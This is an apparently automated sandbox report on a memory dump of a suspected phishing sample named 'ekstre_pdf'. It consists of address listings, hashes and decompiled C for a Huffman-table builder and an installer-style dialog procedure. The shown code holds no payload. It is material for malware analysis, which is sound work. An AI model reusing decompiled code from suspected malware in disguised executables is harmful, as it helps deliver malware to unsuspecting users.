0x00407412
0x00407415
0x00407417
0x00407418
0x00407419
0x0040741c
0x00000000
0x0040741c
0x00407381
0x00407381
0x00407387
0x00407389
0x004073ae
0x004073b1
0x004073b7
0x004073bc
0x004073c2
0x004073c8
0x004073ca
0x004073cd
0x004073d6
0x004073dc
0x004073dc
0x004073cf
0x004073d1
0x004073d3
0x004073d3
0x004073de
0x004073e4
0x004073e6
0x004073e9
0x004073eb
0x004073f1
0x004073f3
0x004073f5
0x004073f7
0x004073f9
0x004073fc
0x00407405
0x00407408
0x00407408
0x004073fe
0x004073fe
0x00407401
0x00407401
0x004073fc
0x004073f3
0x0040740a
0x0040740c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040740c
0x0040738b
0x0040738b
0x00407391
0x00407397
0x00407399
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739d
0x0040739f
0x004073a6
0x004073a6
0x004073a8
0x004073a1
0x004073a1
0x004073a3
0x004073a3
0x004073aa
0x004073ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407424
0x00407424
0x00407427
0x00407429
0x0040742c
0x0040742f
0x0040742f
0x0040742f
0x0040742f
0x00000000
0x00000000
0x00000000
0x00406add
0x00406ac1
0x00000000
0x00406ac7
0x00406aca
0x00406ad4
0x00406ad7
0x00406ada
0x00000000
0x00406ada
0x00406ac1
0x00406ae5
0x00406ae8
0x00406aec
0x00406af6
0x00406b00
0x00406b03
0x00406b09
0x00406c3d
0x00406c3f
0x00406c45
0x00406c48
0x00406c4b
0x00000000
0x00406c4b
0x00406b0f
0x00406b0f
0x00406b10
0x00406b68
0x00406b68
0x00406b6f
0x00406c15
0x00406c15
0x00406c1a
0x00406c1d
0x00406c22
0x00406c25
0x00406c2a
0x00406c2d
0x00406c32
0x00406c35
0x00406c35
0x00000000
0x00406b75
0x00406b75
0x00406b75
0x00406b75
0x00406b79
0x00406b79
0x00406b9b
0x00406b9e
0x00406ba0
0x00406ba3
0x00406ba8
0x00406b7e
0x00406b7e
0x00406b83
0x00406b85
0x00406b87
0x00406b8c
0x00406b92
0x00406b97
0x00406b99
0x00406b99
0x00406b8e
0x00406b8e
0x00406b8e
0x00406b8c
0x00000000
0x00406baa
0x00406bd7
0x00406bdc
0x00406bde
0x00406bdf
0x00406be1
0x00406be2
0x00406be2
0x00406be2
0x00406c0a
0x00406c0f
0x00406c0f
0x00000000
0x00406c0f
0x00406ba8
0x00406b6f
0x00406b12
0x00406b12
0x00406b13
0x00406b5d
0x00000000
0x00406b5d
0x00406b15
0x00406b16
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c72
0x00406c72
0x00406c72
0x00406c75
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c56
0x00000000
0x00000000
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c67
0x00406c69
0x00406c6c
0x00406c6f
0x00406c6f
0x00406c6f
0x00406c77
0x00406c77
0x00406c7a
0x00406c7c
0x00406c81
0x00406c84
0x00406c86
0x00406c89
0x00000000
0x00000000
0x00406c8f
0x00406c8f
0x00406c91
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00000000
0x00000000
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca6
0x00406d44
0x00406d44
0x00406d47
0x00406d49
0x00406d49
0x00406d4c
0x00406d4f
0x00406d51
0x00406d53
0x00406d55
0x00406d55
0x00406d5e
0x00406d63
0x00406d66
0x00406d69
0x00406d6c
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d78
0x00406d78
0x00406d7e
0x00406d7e
0x00406d7e
0x00000000
0x00406d72
0x00406cac
0x00406cac
0x00406cb2
0x00406cb5
0x00406cb7
0x00406ce2
0x00406ce5
0x00406ceb
0x00406cf0
0x00406cf6
0x00406cfc
0x00406cfe
0x00406d01
0x00406d0a
0x00406d10
0x00406d10
0x00406d03
0x00406d05
0x00406d07
0x00406d07
0x00406d12
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1f
0x00406d25
0x00406d27
0x00406d29
0x00406d2c
0x00406d35
0x00406d35
0x00406d37
0x00406d2e
0x00406d2e
0x00406d31
0x00406d31
0x00406d39
0x00406d39
0x00406d27
0x00406d3c
0x00406d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3e
0x00406cb9
0x00406cb9
0x00406cbf
0x00406cc5
0x00406cc7
0x00000000
0x00000000
0x00406cc9
0x00406cc9
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd7
0x00406cd7
0x00406cd9
0x00406cd2
0x00406cd2
0x00406cd4
0x00406cd4
0x00406cdb
0x00406cdd
0x00406ce0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fc7
0x00406fca
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd8
0x00406fdf
0x00406fe1
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406edd
0x00406edd
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406eca
0x00406ecd
0x00406ed0
0x00406ed2
0x00406ed4
0x00406ed7
0x00406eda
0x00406eda
0x00406eda
0x00406ee1
0x00406ee1
0x00406ee9
0x00406eec
0x00406ef2
0x00406ef5
0x00406ef9
0x00406efd
0x00406f00
0x00406f03
0x00406f1b
0x00406f1b
0x00406f1e
0x00406f2c
0x00406f2f
0x00406f20
0x00406f20
0x00406f22
0x00406f29
0x00406f29
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5d
0x00000000
0x00000000
0x00406f38
0x00406f38
0x00406f3c
0x00000000
0x00000000
0x00406f42
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4d
0x00406f4f
0x00406f52
0x00406f55
0x00406f55
0x00406f55
0x00406f5f
0x00406f5f
0x00406f61
0x00406f63
0x00406f6e
0x00406f71
0x00406f74
0x00406f76
0x00406f78
0x00406f7a
0x00406f7d
0x00406f80
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f95
0x00406f98
0x00406f9a
0x00000000
0x00000000
0x00406fa0
0x00406fa0
0x00406fa4
0x00406fb5
0x00406fb5
0x00406fb5
0x00406fb7
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fc1
0x00406fc4
0x00000000
0x00406fc4
0x00406fa6
0x00406fa6
0x00406fa9
0x00000000
0x00000000
0x00406faf
0x00406faf
0x00000000
0x00406faf
0x00406f05
0x00406f05
0x00406f07
0x00406f09
0x00406f0c
0x00406f0f
0x00406f13
0x00406f13
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff1
0x00406ff5
0x00406ff7
0x00406ffa
0x00406ffd
0x00407002
0x00407005
0x00407007
0x00407008
0x0040700b
0x00407016
0x00407019
0x00407030
0x00407035
0x0040703c
0x00407041
0x00407045
0x00407047
0x00407047
0x00407047
0x0040704a
0x0040704c
0x00000000
0x00407052
0x00407052
0x00407056
0x00407061
0x00407074
0x00407079
0x0040707e
0x00407080
0x00000000
0x00000000
0x00407086
0x00407086
0x00407089
0x0040708b
0x00407099
0x00407099
0x0040709c
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x00000000
0x004070ae
0x0040708d
0x0040708d
0x00407093
0x00000000
0x00000000
0x00000000
0x00407093
0x00000000
0x00000000
0x00000000
0x00407432
0x00407432
0x00407438
0x0040743e
0x00407443
0x00407449
0x0040744f
0x00407451
0x00407454
0x0040745d
0x00407463
0x00407463
0x00407456
0x00407458
0x0040745a
0x0040745a
0x00407465
0x00407467
0x0040746a
0x004074a5
0x004074a5
0x00000000
0x0040746c
0x0040746c
0x0040746c
0x00407472
0x00407475
0x00407477
0x004074ac
0x004074ae
0x00000000
0x004074ae
0x00000000
0x00407477
0x00000000
0x00406ab6
0x00407484
0x00000000
0x00407484
0x00406e98
0x00406e9a
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00406e9f
0x00406de4
0x00406da5
0x00407489
0x0040748c
0x0040748e
0x00407497
0x0040749d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x46a190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x46a190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x46a190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bcf81ecb0a63d76df2f52b5064c636593b1bb06d79058e105d0f2082b0a961
Instruction ID: 504baa868681fb8189e06e3a59bc58fc925542c29f33508f00ed0cb03ec6986b
Opcode Fuzzy Hash: 74bcf81ecb0a63d76df2f52b5064c636593b1bb06d79058e105d0f2082b0a961
Instruction Fuzzy Hash: 44C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x47af28;
				_v28 =  *0x47af10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x47af19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x4018 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x47af18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x45024c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x450260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x45024c = 0;
								 *0x450260 = 0;
								 *0x47af60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x47af19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x450260;
									_t201 =  *0x47af28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x47af2c <= 0) {
										L86:
										if( *0x47afbe == 0x400) {
											InvalidateRect(_v8, 0, "true");
										}
										if( *((intOrPtr*)( *0x472edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
